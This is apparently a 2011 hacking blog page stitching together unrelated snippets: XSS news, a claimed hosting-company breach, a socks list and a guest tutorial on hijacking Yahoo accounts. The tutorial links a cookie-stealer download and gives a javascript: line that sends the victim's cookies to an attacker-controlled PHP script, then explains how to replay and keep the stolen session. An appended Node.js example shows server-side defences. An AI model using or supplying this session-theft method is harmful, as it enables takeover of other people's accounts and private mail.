
Tuesday, April 5, 2011

Google XSS Flaw in Website Optimizer Scripts explained !

This week thousands of system administrators who use Google products will open their inboxes to see an email from Google explaining that its Web Optimizer product contains a cross-site scripting flaw that allows hackers to inject scripts into their Google-optimized web pages.
A part of this email follows:

Complete tutorial on Cross Site Scripting / XSS Hacking !

What is XSS ?
'XSS', also known as 'CSS', stands for Cross Site Scripting. It is a very common vulnerability found in web applications. XSS allows the attacker to insert malicious code. There are many types of XSS attacks; I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject code into the affected applications in order to bypass access to the website or to carry out "phishing" against users.


Types of XSS 

Hosting company Hostkey.ru got Compromised !



A hacker hacked into hosting company Hostkey.ru; some proofs of the hack are here:
1.) CMS hacked


Hosting company Hostkey.ru got Compromised ! : The Hacker News ~ http://www.thehackernews.com/2011/04/hosting-company-hostkeyru-got.html

Why the name – Indian Cyber Army?

No one can say that “Indian Cyber Army” is mine. Even I can’t declare that ICA is mine. Indian Cyber Army is the group of hackers or individuals from different parts of India who care for the Nation! I believe anyone who is interested in working for India’s Cyber Space can use the name ICA. Yeah, maybe the way of working will be different, but the aim is the same. Here on our site everyone is openly invited...

Socks 4/5 04-04-2011 updated [II]

Checked at http://f.kunvn.ca/checksock/ Check report

Hack Yahoo accounts with Session IDs or session cookies !

Hello friends, this is a guest post by Mr. Aneesh M. Makker, admin of http://www.explorehacking.com/, on "Hack Yahoo accounts with Session IDs or session cookies".


What are session IDs or session cookies ?
In simple terms, whenever we sign in to an account, a unique string is generated. One copy is saved on the server and the other in our browser as a cookie. Both are matched every time we do anything in our account. This string, or login session, is destroyed when we click on the 'Sign Out' option.

Just log in to yahoo.com. Type this in the browser: javascript:alert(document.cookie);
You will get a pop-up box showing you the cookies. Now log in to your account and do the same thing; you will see more elements added to the cookies. These represent session IDs.

Note: By stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in the form of cookies.

An attacker can steal that session by convincing the victim to run a piece of code in the browser. The attacker can use that stolen session to log in to the victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out', the session gets destroyed and the attacker also gets signed out.

But in the case of Yahoo, it's not the same. The attacker doesn't get signed out when the victim clicks 'Sign out'. The session does get destroyed automatically by Yahoo after 24 hrs, but when the user simply refreshes the window in the Yahoo account, he gets a session for the next 24 hrs. This means that once the Yahoo account session is stolen, the attacker can access the account for a lifetime by refreshing the window every 24 hrs. I am not actually sure whether it's 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs:
1. Sign up for an account at any free webhosting site. I have chosen my3gb.com.

2. Log in to your account and go to the file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this code to the victim to run in his browser while he is logged in to his Yahoo account. Yahoo.php is basically the cookie stealing script, and hacked.php executes the stolen cookies in the browser.
Stolen cookies get stored in the directory 'cookies'.
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would then be redirected back to his Yahoo account.

4. Open hacked.php. The password is 'explore'.

You must have got the username of the victim's account. Simply click on it and it would take you to the inbox of the victim's Yahoo account without asking for any password.

Now it doesn't matter if the victim signs out from his account; you would remain logged in to it.

Note: You can try this attack by using two browsers. Sign in to a Yahoo account in one browser and run the code. Then sign in through the other browser using the stolen session.

Thank you for reading this Article.
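
The behaviour this post depends on is a server-side one: sign-out does not invalidate the session, and every refresh renews it. As an added example (not code from the original post or from Yahoo), here is a small Node.js session store that closes both gaps; the class name, the cookie name `sid` and the timeout values are assumptions chosen for illustration.

```javascript
const { randomBytes } = require('node:crypto');

// Assumed policy values (hypothetical, not Yahoo's): tune for your application.
const IDLE_MS = 30 * 60 * 1000;          // sliding idle timeout
const ABSOLUTE_MS = 24 * 60 * 60 * 1000; // hard cap; activity never extends it

class SessionStore {
  constructor(now = () => Date.now()) {
    this.now = now;            // injectable clock so expiry can be tested
    this.sessions = new Map(); // sessionId -> { user, createdAt, lastSeen }
  }

  // Issue a fresh, unguessable ID at login and build the Set-Cookie value.
  login(user) {
    const id = randomBytes(32).toString('hex');
    const t = this.now();
    this.sessions.set(id, { user, createdAt: t, lastSeen: t });
    // HttpOnly keeps the ID out of document.cookie, so script run in the
    // page cannot read it; Secure and SameSite limit where it is sent.
    return { id, cookie: `sid=${id}; Path=/; HttpOnly; Secure; SameSite=Lax` };
  }

  // Called on every request. Returns the user, or null if the session is dead.
  validate(id) {
    const s = this.sessions.get(id);
    if (!s) return null;
    const t = this.now();
    const expired = t - s.lastSeen > IDLE_MS || t - s.createdAt > ABSOLUTE_MS;
    if (expired) {
      this.sessions.delete(id);
      return null;
    }
    s.lastSeen = t; // a refresh extends the idle window only, not the cap
    return s.user;
  }

  // Sign-out deletes the server-side record, so every copy of the ID,
  // including one held in another browser, stops working at once.
  logout(id) {
    return this.sessions.delete(id);
  }
}
```

With this store, a session ID copied to a second browser dies when the user signs out, and periodic refreshing cannot carry it past the absolute lifetime.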
 